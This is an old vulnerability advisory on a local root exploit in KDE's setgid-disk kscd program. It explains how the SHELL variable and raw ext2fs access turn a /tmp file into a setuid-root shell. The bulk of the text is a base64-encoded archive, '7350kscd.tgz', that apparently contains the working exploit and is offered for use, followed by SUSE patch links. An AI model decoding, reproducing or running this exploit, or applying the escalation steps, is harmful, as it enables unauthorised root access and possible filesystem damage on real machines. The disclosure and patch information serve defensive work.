COMMAND
kcsd
SYSTEMS AFFECTED
KDE
PROBLEM
Sebastian found kscd local root exploit. kscd belongs to the KDE
multimedia-pack. As so often with GUI's, kscd is setgid-disk and
get's the shell for a browser-execution via SHELL-environment
variable. So, we set it to /tmp/boomshell which will make ext2fs
setgid-disk. Then we use ext2fs to change /tmp/boomshell to a
setuid-root-file via raw-filesystem access (we are group disk!).
Please make sure you have
a) ext2fs-lib installed (default)
b) kscd setgid disk (default on SuSE 6.4 f.e.)
c) a CD in drive (hmmm ...)
d) /tmp points to a disk where setuid's are allowes (default)
e) brain and responsibility (unfortunally not default)
Note that the change via ext2fs takes affect after next re-mount
(e.g. 'reboot'). We assume that group disk has GID 6. Change if
necessary.
Warning: You are playing with your filesystem! This can cause
data-loss. Use a zip-disk for playing! YOU USE IT AT YOUR OWN
RISK! This exploit goes under the GPL! Mimed version follows:
---
Content-Type: application/octet-stream; name="7350kscd.tgz"
Content-Transfer-Encoding: base64
Content-Disposition: inline; filename="7350kscd.tgz"
Content-MD5: JuQRHJdCsSWD2GlpmGEs3g==
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
-----
SOLUTION
Red Hat Linux does not ship kscd setuid. Sebastian's exploit
does NOT work against TurboLinux versions 6.0.4 and earlier.
According to the comments in his perl script "7350kscd," an
affected system has kscd setgid disk. TurboLinux, by default,
does NOT do this.
Patches for SuSE:
AXP:
ftp://ftp.suse.com/pub/suse/axp/update/6.1/kde1/kmulti-1.1.2-141.alpha.rpm
ftp://ftp.suse.com/pub/suse/axp/update/6.1/zq1/kmulti-1.1.2-141.src.rpm
ftp://ftp.suse.com/pub/suse/axp/update/6.3/kde1/kmulti-1.1.2-141.alpha.rpm
ftp://ftp.suse.com/pub/suse/axp/update/6.3/zq1/kmulti-1.1.2-141.src.rpm
ftp://ftp.suse.com/pub/suse/axp/update/6.4/kde1/kmulti-1.1.2-141.alpha.rpm
ftp://ftp.suse.com/pub/suse/axp/update/6.4/zq1/kmulti-1.1.2-141.src.rpm
i386:
ftp://ftp.suse.com/pub/suse/i386/update/6.1/kde1/kmulti-1.1.2-141.i386.rpm
ftp://ftp.suse.com/pub/suse/i386/update/6.1/zq1/kmulti-1.1.2-141.src.rpm
ftp://ftp.suse.com/pub/suse/i386/update/6.2/kde1/kmulti-1.1.2-141.i386.rpm
ftp://ftp.suse.com/pub/suse/i386/update/6.2/zq1/kmulti-1.1.2-141.src.rpm
ftp://ftp.suse.com/pub/suse/i386/update/6.3/kde1/kmulti-1.1.2-141.i386.rpm
ftp://ftp.suse.com/pub/suse/i386/update/6.3/zq1/kmulti-1.1.2-141.src.rpm
ftp://ftp.suse.com/pub/suse/i386/update/6.4/kde1/kmulti-1.1.2-140.i386.rpm
ftp://ftp.suse.com/pub/suse/i386/update/6.4/zq1/kmulti-1.1.2-140.src.rpm
PPC:
ftp://ftp.suse.com/pub/suse/ppc/update/6.4/kde1/kmulti-1.1.2-141.ppc.rpm
ftp://ftp.suse.com/pub/suse/ppc/update/6.4/zq1/kmulti-1.1.2-141.src.rpm